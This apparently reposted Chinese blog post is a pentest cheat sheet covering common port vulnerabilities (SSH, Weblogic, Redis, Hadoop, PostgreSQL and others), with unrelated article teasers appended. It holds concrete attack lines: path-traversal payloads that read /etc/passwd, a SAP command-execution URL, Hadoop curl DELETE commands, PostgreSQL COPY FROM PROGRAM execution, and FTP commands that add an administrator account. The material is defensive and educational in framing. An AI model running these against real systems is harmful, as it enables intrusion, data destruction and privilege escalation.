暴露你系统安全的黑暗角落:常见端口漏洞大合集!

news2024/12/24 0:04:27

目录

前言

一、远程管理端口

1.22 端口(SSH)

2.23 端口(Telnet)

3.3389 端口(RDP)

4.5632 端口(Pcanywhere)

5.5900 端口(VNC)

二、Web中间件/服务端口

6.1090/1099 端口(RMI)

7.7001 端口(Weblogic)

8.8000 端口(jdwp)

9.8080 端口(Tomcat)

10.8080 端口(Jboss)

11.8080 端口(Resin)

12.8080 端口(Jetty)

13.8080 端口(GlassFish)

14.8080 端口(Jenkins)

15.8161 端口(ActiveMQ)

16.9043 端口(webSphere)

17.50000 端口 (SAP)

18.50070 端口(hadoop)

三、数据库端口

19.389 端口(ldap)

20.1433 端口(Mssql)

23.1521 端口(Oracle)

24.3306 端口(MySQL)

25.5432 端口( PostgreSQL)

26.5984 端口(CouchDB)

 27.6379 端口(Redis)

28.9200 端口(elasticsearch)

29.11211 端口(MemCache)

30.27017 端口(Mongodb)

四、常见协议端口

31.21 端口(FTP)

32.25 端口(SMTP)

33.53 端口(DNS)

34.161 端口(SNMP)

35.443 端口(SSL)

36.445 端口(SMB)

37.873 端口(Rsync)

38.2181 端口(Zookeeper)

39.2375 端口(Docker)

总结


🌈嗨!我是Filotimo__🌈。很高兴与大家相识,希望我的博客能对你有所帮助。

💡本文由Filotimo__✍️原创,首发于CSDN📚。

📣如需转载,请事先与我联系以获得授权⚠️。

🎁欢迎大家给我点赞👍、收藏⭐️,并在留言区📝与我互动,这些都是我前进的动力!

🌟我的格言:森林草木都有自己认为对的角度🌟。

前言

在数字化时代,网络安全问题日益成为人们关注的焦点。而端口漏洞作为网络攻击的常见入口之一,给系统安全带来了巨大的隐患。本文将深入探讨常见端口漏洞的特征和危害,只有充分了解和掌握端口漏洞的相关知识,我们才能建立起坚固的防线,保护自己的系统免受威胁。详细内容请看正文


一、远程管理端口

1.22 端口(SSH)

安全攻击:弱口令、暴力猜解、用户名枚举。
利用方式:
1、通过用户名枚举可以判断某个用户名是否存在于目标主机中,
2、利用弱口令/暴力破解,获取目标主机权限。

2.23 端口(Telnet)

安全漏洞:弱口令、明文传输。
利用方式:
1、通过弱口令或暴力破解,获取目标主机权限。
2、嗅探抓取telnet明文账户密码。

3.3389 端口(RDP)

安全漏洞:暴力破解。
利用方式:通过弱口令或暴力破解,获取目标主机权限。

4.5632 端口(Pcanywhere)

安全漏洞:弱口令、暴力破解。
利用方式:通过弱口令或暴力破解,获取目标主机权限。

5.5900 端口(VNC)

安全漏洞:弱口令、暴力破解。
利用方式:通过弱口令或暴力破解,获取目标主机权限。

二、Web中间件/服务端口

6.1090/1099 端口(RMI)

安全漏洞:JAVA RMI 反序列化远程命令执行漏洞。
利用方式:使用nmap检测端口信息。
端口信息:1099/1090    Java-rmi    Java RMI Registry
检测工具:attackRMI.jar

7.7001 端口(Weblogic)

安全漏洞:弱口令、SSRF、反序列化漏洞。
利用方式:
1、控制台弱口令上传war木马
2、SSRF内网探测
3、反序列化远程代码执行等

8.8000 端口(jdwp)

安全漏洞:JDWP 远程命令执行漏洞。
端口信息:
      8000             jdwp           java Debug Wire Protocol
检测工具:https://github.com/IOActive/jdwp-shellifier

9.8080 端口(Tomcat)

安全漏洞:弱口令、示例目录。
利用方式:通过弱口令登录控制台,上传war包。

10.8080 端口(Jboss)

安全漏洞:未授权访问、反序列化。
利用方式:
1、未授权访问控制台,远程部署木马
2、反序列化导致远程命令执行等。
检测工具:https://github.com/joaomatosf/jexboss

11.8080 端口(Resin)

安全漏洞:目录遍历、远程文件读取。
利用方式:通过目录遍历/远程文件读取获取敏感信息,为进一步攻击提供必要的信息。

任意文件读取POC:
payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"
payload3 = "/ ..\\\\web-inf"

12.8080 端口(Jetty)

安全漏洞:远程共享缓冲区泄漏。
利用方式:攻击者可以通过精心构造headers值来触发异常并偏移到共享缓冲区,其中包含了之前其他用户提交的请求,服务器会根据攻击者的payload返回特定位置的数据。
检测工具:https://github.com/GDSSecurity/Jetleak-Testing-Script

13.8080 端口(GlassFish)

安全漏洞:弱口令、任意文件读取。
利用方式:
1、弱口令admin/admin,直接部署shell
2、任意文件读取获取服务器敏感配置信息

14.8080 端口(Jenkins)

安全漏洞:未授权访问 、远程代码执行。
利用方式:访问如下url,可以执行脚本命令,反弹shell,写入webshell等。
http://<target>:8080/manage
http://<target>:8080/script

15.8161 端口(ActiveMQ)

安全漏洞:弱口令、任意文件写入、反序列化。
利用方式:默认密码admin/admin登陆控制台、写入webshell、上传ssh key等方式。

16.9043 端口(webSphere)

安全漏洞:控制台弱口令、远程代码执行。
后台地址:https://:9043/ibm/console/logon.jsp

17.50000 端口 (SAP)

安全漏洞:远程代码执行。
利用方式:攻击者通过构造url请求,实现远程代码执行。
POC:http://<target>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all

18.50070 端口(hadoop)

安全漏洞:未授权访问。
利用方式:攻击者可以通过命令行操作多个目录下的数据,如进行删除操作。
curl -i -X DELETE “http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true“
curl -i -X PUT “http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS“

三、数据库端口

19.389 端口(ldap)

安全漏洞:未授权访问 、弱口令。
利用方式:通过LdapBrowser工具直接连入。

20.1433 端口(Mssql)

安全漏洞:弱口令、暴力破解。
利用方式:差异备份getshell、SA账户提权等。

23.1521 端口(Oracle)

安全漏洞:弱口令、暴力破解。
利用方式:通过弱口令/暴力破解进行入侵。

24.3306 端口(MySQL)

安全漏洞:弱口令、暴力破解。
利用方式:利用日志写入webshell、udf提权、mof提权等。

25.5432 端口( PostgreSQL)

安全漏洞:弱口令、高权限命令执行。
利用方式:攻击者通过弱口令获取账号信息,连入postgres中,可执行系统命令。
PoC参考:
    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec(cmd_output text);
    COPY cmd_exec FROM PROGRAM 'id';
    SELECT * FROM cmd_exec;

26.5984 端口(CouchDB)

安全漏洞:垂直权限绕过、任意命令执行。
利用方式:通过构造数据创建管理员用户,使用管理员用户登录,构造恶意请求触发任意命令执行。
后台访问:http://<target>:5984/_utils

 27.6379 端口(Redis)

安全漏洞:未授权访问。
利用方式:绝对路径写webshell 、利用计划任务执行命令反弹shell、公私钥认证获取root权限、主从复制RCE等。

28.9200 端口(elasticsearch)

安全漏洞:未授权访问、命令执行。
检测方式:
1、直接访问如下url,获取相关敏感信息。
  http://<target>:9200/_nodes  
查看节点数据
  http://<target>:9200/_river  查看数据库敏感信息
2、通过构造特定的数据包,执行任意命令。

29.11211 端口(MemCache)

安全漏洞:未授权访问。
检测方式:无需用户名密码,可以直接连接memcache 服务的11211端口。
nc -vv <target> 11211

30.27017 端口(Mongodb)

安全漏洞:未授权访问、弱口令。
利用方式:未授权访问/弱口令,远程连入数据库,导致敏感信息泄露。

四、常见协议端口

31.21 端口(FTP)

安全漏洞:1、配置不当    2、明文传输    3、第三方软件提权
利用方式:
1、匿名登录或弱口令
2、嗅探ftp用户名和密码
3、Serv-U权限较大的账号可导致系统命令执行。
FTP提权命令:
  # 增加系统用户
   Quote site exec net user 4567 4567 /add
  # 提升到管理员权限
   Quote site exec net localgroup administrators 4567 /add

32.25 端口(SMTP)

攻击方式:1、匿名发送邮件 2、弱口令 3、SMTP用户枚举
利用方式:
1、SMTP服务器配置不当,攻击者可以使用任意用户发送邮件。
2、SMTP弱口令扫描,获取用户账号密码,发送邮件钓鱼。
3、通过SMTP用户枚举获取用户名:
   nmap -p 25 -- smtp-enum-users.nse <target>

33.53 端口(DNS)

安全攻击:1、DNS域传送漏洞、DNS欺骗、DNS缓存投毒
检测方式:
1、DNS域传送漏洞,Windows下检测使用nslookup命令,Linux下检测使用dig命令,通过执行命令可以清楚的看到域名解析情况。
2、DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。
3、DNS缓存投毒是攻击者欺骗DNS服务器相信伪造的DNS响应的真实性。

34.161 端口(SNMP)

安全漏洞:默认团体名/弱口令访问。
利用方式:通过nmap自带的审计脚本进行检测,可能导致敏感信息泄露。。
1、弱口令检测:nmap –sU –p161 –script=snmp-brute <target>
2、获取系统信息:nmap –sU –p161 –script=snmp-sysdescr <target>
3、获取用户信息:nmap -sU -p161 --script=snmp-win32-user <target>
4、获取网络端口状态:nmap -sU -p161 --script=snmp-netstat <target>

35.443 端口(SSL)

安全漏洞:OpenSSL 心脏出血。
利用方式:攻击者可以远程读取存在漏洞版本的openssl服务器内存中长大64K的数据。
扫描脚本:nmap -sV --script=ssl-heartbleed <target>

36.445 端口(SMB)

安全漏洞:信息泄露、远程代码执行。
利用方式:可利用共享获取敏感信息、缓冲区溢出导致远程代码执行,如ms17010。

37.873 端口(Rsync)

安全漏洞:匿名访问、弱口令。
利用方式:攻击者可以执行下载/上传等操作,也可以尝试上传webshell。
1、下载:#rsync -avz a.b.c.d::path/file path/filiname  
2、上传:#rsync -avz path/filename a.b.c.d::path/file

38.2181 端口(Zookeeper)

安全漏洞:未授权访问。
检测方式:攻击者可通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
 echo envi | nc ip port

39.2375 端口(Docker)

安全漏洞:未授权方式。
检测方式:通过docker daemon api 执行docker命令。
#列出容器信息,效果与docker ps -a 一致。
 
curl http://<target>:2375/containers/json
 
docker -H tcp://<target>:2375 start <Container Id>


总结

本文剖析了常见端口漏洞的本质和危害,着重强调了对系统安全的重要性和防范措施的必要性。通过此文,相信您已经了解到常见的端口漏洞。请保持警惕和更新意识,以确保您的系统始终处于安全的状态。通过加强对端口漏洞的认识并采取相应的保护措施,我们可以为今后的网络安全风险构建更健全的基础。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1100931.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

构建强大监控系统:使用Linux Zabbix和cpolar实现远程访问

❤️博客主页&#xff1a; iknow181 &#x1f525;系列专栏&#xff1a; Python、JavaSE、JavaWeb、CCNP &#x1f389;欢迎大家点赞&#x1f44d;收藏⭐评论✍ 目录 1. Linux 局域网访问Zabbix 2. Linux 安装cpolar 3. 配置Zabbix公网访问地址 4. 公网远程访问Zabbix 5. …

基于Java的健身运动网站系统设计与实现(源码+lw+部署文档+讲解等)

文章目录 前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序&#xff08;小蔡coding&#xff09; 代码参考数据库参考源码获取 前言 &#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者&am…

SQL sever中的触发器

目录 一、触发器概念 二、触发器优缺点 2.1优点&#xff1a; 2.2缺点&#xff1a; 三、触发器种类 四、触发器创建 4.1创建DML触发器 4.2创建DDL触发器 4.3创建登录触发器 五、触发器管理 5.1查看触发器 5.1.1.使用sp_helptext存储过程查看触发器 5.1.2.获取数据库…

367. 有效的完全平方数

367. 有效的完全平方数 原题链接&#xff1a;完成情况&#xff1a;解题思路&#xff1a;参考代码&#xff1a;1. 二分查找2. 使用内置的库函数3. 暴力遍历4. 牛顿迭代 原题链接&#xff1a; 367. 有效的完全平方数 https://leetcode.cn/problems/valid-perfect-square/submi…

八、添加和风天气插件

简介 给个人首页简介添加一个查看天气的免费功能插件 和风天气插件。⭐️ 欢迎访问个人的简历网站预览效果 本章涉及修改与新增的文件&#xff1a;index.html、First.vue 、App.vue 一、注册账号 登录和风天气官网&#xff0c;注册个人账号 和风天气官网 选择你想要的插件…

idea不识别yaml文件导致,配置文件点击跳转不了类

文章目录 场景确认的idea安装了ymal插件,确认你的配置文件是yml格式的还是ymal格式的然后在项目配置中看看是否有对应的后缀.最后看看在项目模块里面有没有spring模块跟对应的配置文件,如果没有就要添加这样点击配置文件就能跳转到对应的实体类了 场景 在使用idea时&#xff0…

百题千解计划【CSDN每日一练】LLM大语言模型:必练选择题及解析 | “等差数列”多解法:Python、Java、C语言、C++...

月落乌啼霜满天,江枫渔火对愁眠。 🎯作者主页: 追光者♂🔥 🌸个人简介: 💖[1] 计算机专业硕士研究生💖 🌟[2] 2022年度博客之星人工智能领域TOP4🌟 🏅[3] 阿里云社区特邀专家博主🏅 🏆[4] CSDN-人工智能领域优质创作者🏆 📝[5] …

面试题:当你的JVM 堆内存溢出后,其他线程是否可继续工作?

最近网上出现一个美团面试题&#xff1a;“一个线程OOM后&#xff0c;其他线程还能运行吗&#xff1f;” 我看网上出现了很多不靠谱的答案。这道题其实很有难度&#xff0c;涉及的知识点有jvm内存分配、作用域、gc等&#xff0c;不是简单的是与否的问题。 由于题目中给出的OO…

【黑马程序员】机器学习

&#xff08;一&#xff09;机器学习概述 一、机器学习算法分类 1、监督学习&#xff1a; &#xff08;1&#xff09;目标值是类别&#xff1a;分类问题 k-近邻算法、贝叶斯分类、决策树与随机森林、逻辑回归 &#xff08;2&#xff09;目标值是连续型的数据&#xff1a;回归…

【吞噬星空】爽翻,徐欣喜提永恒之体,罗峰秒杀败类,阿特金磕头认错

Hello,小伙伴们&#xff0c;我是小郑继续为大家深度解析国漫资讯。 吞噬星空动画第89集终于更新了&#xff0c;阿特金三大巨头的好日子到头了&#xff0c;从他们对徐欣出手的那一刻&#xff0c;就已经有取死之道。如今罗峰强势回归&#xff0c;上演复仇戏码&#xff0c;让大家看…

故障诊断实验台 | PT500mini轴承齿轮箱转子故障实验台

故障诊断实验台 | PT500mini轴承齿轮箱转子故障实验台 1 实验台简介2 实验台功能3 实验台技术清单4 价格 很多同学因为实验数据而被困扰&#xff0c;目前数据来源有3方面&#xff0c;公开实验数据集、校企合作项目实际数据、自制实验台数据。 公开实验数据集被用烂了&#xff0…

2023年中国铝压延产量、销售收入及市场规模分析[图]

铝压延加工业是将电解铝&#xff08;主要是铝锭&#xff09;通过熔铸、轧制或挤压、表面处理等多种工艺及流程生产出各种铝材的过程。铝材按照加工工艺的不同又可以分为铝轧制材和铝挤压材。 2018-2022年中国铝材产量累计值及增速 资料来源&#xff1a;共研产业咨询&#xff0…

PC网站支付宝扫码登录

1.电脑网站支付宝登录&#xff0c;拼接授权链接&#xff0c;在浏览器上访问授权链接即可登录 - 支付宝欢迎登录支付宝&#xff0c;支付宝-全球领先的独立第三方支付平台&#xff0c;致力于为广大用户提供安全快速的电子支付/网上支付/安全支付/手机支付体验以及转账收款/水电煤…

winform 修改句柄数量

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows 1、GDIProcessHandleQuota 此项设置GDI句柄数量&#xff0c;默认值为2710(16进制)/10000(10进制)&#xff0c;该值的允许范围为 256 ~ 16384 &#xff0c;将其调整为大于默认的10000的值。如果…

2023年中国乳胶制品产量、需求量及市场规模分析[图]

乳胶泛指聚合物微粒分散于水中形成的胶体乳液&#xff0c;又称胶乳。习惯上将橡胶微粒的水分散体称为胶乳&#xff0c;而将树脂微粒的水分散体称为乳液。以乳胶为原料制成的制品称乳胶制品&#xff0c;常见的如海绵、手套、玩具、胶管等。 我国乳胶制品细分主要分为避孕套、乳胶…

使用magic-api构建迅速开发平台的成功案例分享

通过一个简单的demo让您了解magic-api的强大功能。在开始之前&#xff0c;请确保您已经满足以下条件&#xff1a; 拥有Java开发环境及相关IDE。 拥有Mysql环境。 对Spring Boot有一定的了解。 对Maven有基本的了解。 只需要几个简单的步骤&#xff0c;您就可以开始使用mag…

易点易动引入RFID标签自动精准盘点,让固定资产盘点更高效

随着企业规模的扩大和固定资产数量的增加&#xff0c;固定资产的盘点工作变得越来越繁琐&#xff0c;传统的手工盘点方式不仅效率低下&#xff0c;还容易出现错误。为了解决这一问题&#xff0c;我们推出了易点易动固定资产管理系统&#xff0c;该系统引入了RFID&#xff08;射…

如何打造智慧公厕管理系统,提升公共厕所智能化服务质量?

在城市的角角落落&#xff0c;公共厕所是人们生活中不可或缺的基础设施之一。然而&#xff0c;过去公共厕所由于采用粗放式的管理&#xff0c;只关注清洁卫生&#xff0c;而在管理上会存在着一系列问题&#xff0c;如卫生状况不佳、维护不到位、管理不科学等。为了改善这一现状…

github: kex_exchange_identification: Connection closed by remote host

问题描述 (base) ➜ test git:(dev) git pull kex_exchange_identification: Connection closed by remote host Connection closed by 192.30.255.113 port 22 致命错误&#xff1a;无法读取远程仓库。解决方案 参照下边文档 https://docs.github.com/en/authentication/tr…

面试58同城!面试官问我redis 雪崩、穿透、击穿怎么处理?

一、Redis 缓存雪崩 1.1 缓存雪崩的概念 缓存雪崩指的是在某个时间点&#xff0c;缓存中的大量数据同时失效&#xff0c;导致大量请求直接落到数据库上&#xff0c;造成数据库压力过大&#xff0c;甚至引发系统崩溃。 1.2 缓存雪崩发生的原因 缓存雪崩通常是由以下原因引起…